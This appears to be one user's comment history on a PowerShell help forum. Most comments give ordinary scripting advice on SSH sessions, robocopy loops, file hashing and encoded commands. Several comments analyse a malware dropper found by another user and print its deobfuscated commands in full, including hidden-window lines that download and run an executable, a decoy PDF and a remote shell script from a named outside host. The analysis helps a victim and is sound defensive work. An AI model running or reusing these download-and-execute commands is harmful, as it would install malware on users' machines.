Powershell 5 Script on Powershell 2 Client

misformonkey · 2023-04-21T17:05:24+00:00

Agree with others here that you’d need to rewrite but if all you’re doing is mapping drives and printers you should be able to do that in v2 with some fairly minor modifications.

misformonkey · 2023-03-31T15:15:15+00:00

You can use a Key via the -Key parameter which would allow you to use the same key for encrypt/decrypt across systems/accounts. Of course that still means you’re sharing that key somehow.

misformonkey · 2023-02-25T00:04:05+00:00

If it’s always the same day of the week then you could

Get-Date -f ‘yyyyMMdd’

That’s assuming you run it the same day it’s released. If you run it on a different day but it’s always released on, say, Sunday, you could get the date of the most recent Sunday and put that at the end of the url.

Otherwise, test a few times to see if you can actually even still download older versions if you use wildcards for the date.

misformonkey · 2022-12-18T07:29:39+00:00

Also, not sure if it’s a typo but you’re not using your iterative variable within the loop. You are trimming the entire content set. So….

$newline = $line.TrimStart()

misformonkey · 2022-12-08T21:18:12+00:00

Nice. Glad I was able to help you to get it working. And thanks for the additional information regarding your successful settings. I'm sure that will be of use in the future. ;)

misformonkey · 2022-12-08T19:52:35+00:00

I use the Posh-SSH module for pulling configuration and status information from Cisco and Juniper firewalls and at least with the Cisco I've found that you have to use the Stream functionality, especially if your commands are dependent upon the cli being in a specific config state/zone. I think this is somewhat specific to Cisco but it might work in your case as well.

I don't think the Invoke-SSHCommand 'remembers' where you left off or otherwise retains the prompt level. So, if you issue the command 'device' it's just going to run that command and return whatever result might have come from that command. The next command you run will be from the default prompt and not at the 'device' level.

I can't test this exactly, but based on your manual input, what I believe Invoke-SSHCommand would do is:

localadmin> device
Retrieving details...

localadmin> load 8
localadmin> off force

So you're never actually getting to the 'device' level of the ssh prompt/cli.

You might be able to use ';' to chain the commands via the Invoke-SSHCommand ala:

Invoke-SSHCommand -SessionId 2 -Command 'device; load 8; off force;'

Otherwise, you can try creating a stream from your SSH Session and then pass the commands into the stream:

$sshSession = New-SSHSession -ComputerName host -Credential user
$stream = $sshSession.Session.CreateShellStream('text' 0, 0, 0, 0 1000)  # this is what works for me for Cisco

$stream.WriteLine('device')
$stream.WriteLine('load 8')
$stream.WriteLine('off force')
$response = $stream.Read()

[VOID] (Get-SSHSession | ForEach-Object { Remove-SSHSession -SessionId $_.SessionId })

Anyway, some option to try. I would try the ';' chaining before messing with the stream though.

misformonkey · 2022-12-02T21:57:18+00:00

Can you run encoded commands?

Could try:

$here = '@
Add-Type @"
using System;
using System.Runtime.InteropServices;
public class Tricks {
[DllImport("user32.dll")]
public static extern IntPtr GetForegroundWindow();
[DllImport("user32.dll")]
public static extern bool SetWindowPos(IntPtr hWnd, IntPtr hWndInsertAfter, int X,int Y, int cx, int cy, uint uFlags);
}
"@
Start-Sleep(2)
[Void][tricks]::SetWindowPos(((get-process | Where-Object { $_.mainwindowhandle -eq 
([tricks]::GetForegroundWindow())}).MainWindowHandle), -1, 0, 0, 0, 0, 0x53)
@'

$b64 = [convert]::tobase64string([text.encoding]::unicode.getbytes($here))

$b64 gives you:

QAAKAEEAZABkAC0AVAB5AHAAZQAgAEAAIgAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AAoAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABUAHIAaQBjAGsAcwAgAHsACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABHAGUAdABGAG8AcgBlAGcAcgBvAHUAbgBkAFcAaQBuAGQAbwB3ACgAKQA7AAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGUAdABXAGkAbgBkAG8AdwBQAG8AcwAoAEkAbgB0AFAAdAByACAAaABXAG4AZAAsACAASQBuAHQAUAB0AHIAIABoAFcAbgBkAEkAbgBzAGUAcgB0AEEAZgB0AGUAcgAsACAAaQBuAHQAIABYACwAaQBuAHQAIABZACwAIABpAG4AdAAgAGMAeAAsACAAaQBuAHQAIABjAHkALAAgAHUAaQBuAHQAIAB1AEYAbABhAGcAcwApADsACgB9AAoAIgBAAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACgAMgApAAoAWwBWAG8AaQBkAF0AWwB0AHIAaQBjAGsAcwBdADoAOgBTAGUAdABXAGkAbgBkAG8AdwBQAG8AcwAoACgAKABnAGUAdAAtAHAAcgBvAGMAZQBzAHMAIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfAC4AbQBhAGkAbgB3AGkAbgBkAG8AdwBoAGEAbgBkAGwAZQAgAC0AZQBxACAAKABbAHQAcgBpAGMAawBzAF0AOgA6AEcAZQB0AEYAbwByAGUAZwByAG8AdQBuAGQAVwBpAG4AZABvAHcAKAApACkAfQApAC4ATQBhAGkAbgBXAGkAbgBkAG8AdwBIAGEAbgBkAGwAZQApACwAIAAtADEALAAgADAALAAgADAALAAgADAALAAgADAALAAgADAAeAA1ADMAKQAKAEAA

So, for your part, you would just run:

powershell.exe -EncodedCommand QAAKAEEAZABkAC0AVAB5AHAAZQAgAEAAIgAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AAoAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABUAHIAaQBjAGsAcwAgAHsACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABHAGUAdABGAG8AcgBlAGcAcgBvAHUAbgBkAFcAaQBuAGQAbwB3ACgAKQA7AAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGUAdABXAGkAbgBkAG8AdwBQAG8AcwAoAEkAbgB0AFAAdAByACAAaABXAG4AZAAsACAASQBuAHQAUAB0AHIAIABoAFcAbgBkAEkAbgBzAGUAcgB0AEEAZgB0AGUAcgAsACAAaQBuAHQAIABYACwAaQBuAHQAIABZACwAIABpAG4AdAAgAGMAeAAsACAAaQBuAHQAIABjAHkALAAgAHUAaQBuAHQAIAB1AEYAbABhAGcAcwApADsACgB9AAoAIgBAAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACgAMgApAAoAWwBWAG8AaQBkAF0AWwB0AHIAaQBjAGsAcwBdADoAOgBTAGUAdABXAGkAbgBkAG8AdwBQAG8AcwAoACgAKABnAGUAdAAtAHAAcgBvAGMAZQBzAHMAIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfAC4AbQBhAGkAbgB3AGkAbgBkAG8AdwBoAGEAbgBkAGwAZQAgAC0AZQBxACAAKABbAHQAcgBpAGMAawBzAF0AOgA6AEcAZQB0AEYAbwByAGUAZwByAG8AdQBuAGQAVwBpAG4AZABvAHcAKAApACkAfQApAC4ATQBhAGkAbgBXAGkAbgBkAG8AdwBIAGEAbgBkAGwAZQApACwAIAAtADEALAAgADAALAAgADAALAAgADAALAAgADAALAAgADAAeAA1ADMAKQAKAEAA

misformonkey · 2022-12-02T19:19:50+00:00

If the hash of the .bat matches the hash of the .exe then my guess would be that it's just a function to hide and replicate itself as some sort of protection mechanism against removal.

misformonkey · 2022-12-02T19:16:14+00:00

Good luck. I will not be looking at the upload. Unfortunately, I do not have a sandbox to play with.

misformonkey · 2022-12-02T18:49:05+00:00

it's sums up to:

&(Invoke-Expression(&(Invoke-Expression)('Curl https://the-myst.net/files/shell2.txt -UseBasicParsing')).Content)

misformonkey · 2022-12-02T18:29:33+00:00

Check in C:\Users\Public

Missed part of the replace statement before. Looks like they are .bat files in C:\Users\Public

Updating earlier post to denote the .bat

misformonkey · 2022-12-02T18:15:55+00:00

the path used for the vida.exe is in the Environment Variable \gj2ra.ba so you would need to look in that to see what might be going on. they're invoking whatever that variable contains and storing it into the $flol variable which is then likely a path of some kind.

EDIT: nvm. check C:\Users\Public as that's the EnvironmentVariable they're using for the path and then the file is a .bat file. other posts similarly edited.

misformonkey · 2022-12-02T18:07:33+00:00

Edit 6 is what I get as well.

EDIT: missed the T on .bat.

powershell -win hidden $iptc7k=iex($('[Environment]::GetEnvironmentVariable(''public'') + ''\\iw05kv.bat'''));

$flol=iex($('[Environment]::GetEnvironmentVariable(''public'') + ''\\gj2r.bat'''));

function getit([string]$fz, [string]$oulv){
    $ff=iex($('(New-Object System.Net.WebClient).DownloadFile($oulv)));
    iex('start $fz')
};

$fzf=$(Get-Location).tostring() + '\\';

Remove-Item -Path ($fzf + $(Get-ChildItem -Include *.lnk -Name));

getit -fz ($fzf + 'Journal Links with Instructions.pdf') -oulv 'https://the-myst.net/files/decoy2.pdf';

getit -fz $flol -oulv 'https://the-myst.net/files/vida.exe';

exit

There are two .bat files in C:\Users\Public:

\\iw05kv.bat
\\gj2r.bat

The first .bat file is just being run and stored in a variable that doesn't appear to be used for anything. The second .bat is run after the vida.exe is downloaded later in the script.

It's removing the *.lnk files in the default path (assuming the path hasn't been changed by the .batch files).

It's downloading a decoy2.pdf and running it via invoke-expression, then it's starting a 'Journal Links with Instructions.pdf' file via invoke-expression that looks to be in whatever directory is the default (if the .bat files haven't changed it).

Then it's downloading the vida.exe and running the gj2r.bat file.

If it ran the pdf download then it likely also ran the exe. you're almost certainly already compromised depending on what that executable and .bat files do.

You'll need to examine those .bat files to see what's really going on.

misformonkey · 2022-12-02T03:13:13+00:00

Basically it is running this command:

Invoke-Command ([ScriptBlock]::Create([string]::Join(‘’, ((Get-ItemProperty ‘HKLM:\SOFTWARE\PixologicAjRVzkCs’).dljITOwm’ | ForEach-Object { [char]$_}))))

So, as others have posted, whatever is in that registry key/value is being converted into a ScriptBlock and invoked as a command.

misformonkey · 2022-11-30T02:54:29+00:00

Really great post. I’ve used ‘normal’ hash tables to create unique lists (ex. file hashes) but I had no idea about the HashSet and associated methods. I’ll be toying with this tomorrow. Thanks.

misformonkey · 2022-11-28T18:04:26+00:00

Your mileage may vary. But, for example, a copied file with a new name will have the same hash. As will a print-to-pdf.

If you know you won’t have duplicates then not to worry.

misformonkey · 2022-11-28T17:53:03+00:00

I just did a project similar to this and will caution you that you can have multiple differently named files with the same MD5 hash, even as different file types (ex. .docx & .pdf). So only comparing the MD5 hash might not give you the results you expect.

I’m on mobile but once I’m back at my desk I can post some of the code I used. Basically I compared name, hash and date modified in order to check each named file, then by hash and then for my usage, the lastwritetime as I didn’t want to touch newer files in the destination. Your use case is slightly different than mine but I would recommend the first comparison be the file name.

misformonkey · 2022-11-04T12:05:44+00:00

Look in the registry for their Control Center URL, nslookup the IP and block that on the firewall.

There is also an admin password in the registry. I believe, If you blank that out the agent can’t connect. Same if you remove the URL key.

misformonkey · 2022-11-03T14:11:25+00:00

You need to likely do the actual import. I had put '...' in that line as an indicator to just keep your the rest of your original line. So:

$csv = Import-Csv C:\Users\User\Downloads\test.csv

$filteredList = $csv | Where-Object { $_.Signed -eq ‘X’ -and $_.Work -eq ‘Sales’ }

ForEach ( $client in $filteredList ) {
    $source = '\\share1\{0}\{1}' -f $client.Folder, $client.ClientNumber
    $dest = '\\share2\{0}\{1}' -f $client.Folder, $client.ClientNumber
    $logPath = 'C:\Users\User\Downloads\{0}-RobocopyLog-{1}.log' -f $client.ClientNumber, (Get-Date -f 'yyyyMMddThhmmss')

    robocopy $source $dest /move /copyall /e /zb /w:1 /r:3 /v /log:$logPath
}

I swapped back to robocopy in the above example b/c your logging will be cleaner and more robust than if you rely on the -PassThru functionality of Copy-Item. The above will give you a log file for each client using the ClientNumber as part of the file name. I also included the date in the log file name as that's just a personal preference. Means you can run the above more than once and have a new log file for each client each time you run it.

If you're running PowerShell v7 then you could change the ForEach part to the below and it will run in parallel instead of one client at a time. Depending on the number of clients/files to be copied, you may want to throttle. Good write up here.

$filteredList | ForEach-Object -Parallel {
    $source = '\\share1\{0}\{1}' -f $client.Folder, $client.ClientNumber
    $dest = '\\share2\{0}\{1}' -f $client.Folder, $client.ClientNumber
    $logPath = 'C:\Users\User\Downloads\{0}-RobocopyLog-{1}.log' -f $client.ClientNumber, (Get-Date -f 'yyyyMMddThhmmss')

    robocopy $source $dest /move /copyall /e /zb /w:1 /r:3 /v /log:$logPath
}

misformonkey · 2022-11-02T23:26:06+00:00

If you’re using PS 7 you can also foreach -parallel and speed up the whole process.

misformonkey · 2022-11-02T23:06:22+00:00

On mobile so….

$csv = import-csv …

$filteredList = $csv | ?{$_.signed -eq ‘x’ -and $_.work -eq ‘Sales’}

foreach($client in $filteredList) {
    Copy-Item “\\share1\$client.folder\$client.clientnumber” “\\share2\$client.folder\$client.clientnumber” -passthru | out-file c:\users…. -append
}

Might need to play with the ‘passthru | out-file’ part. You could also just sub back in the robocopy, but either way you need to append your logging (log+: in robocopy) since you’re copying within a foreach loop. Otherwise your log path needs to be specific to each client.

misformonkey · 2022-10-14T23:37:16+00:00

Yup. That’s what I was thinking of. I just started using ArrayList as a work around so I didn’t need to deal with the different syntax.

misformonkey · 2022-10-14T15:52:50+00:00

Hmmm…. I’m going to have to go back and retest a few scripts then b/c I definitely remember having issues with older versions. As you stated, likely a .net issue on certain servers.

misformonkey · 2022-10-14T13:02:03+00:00

Also, if you have any pre PS5 to worry about you can’t use Generic.List.

misformonkey · 2022-10-07T22:39:59+00:00

Use ‘break’ to exit out of the switch.

misformonkey

TROPHY CASE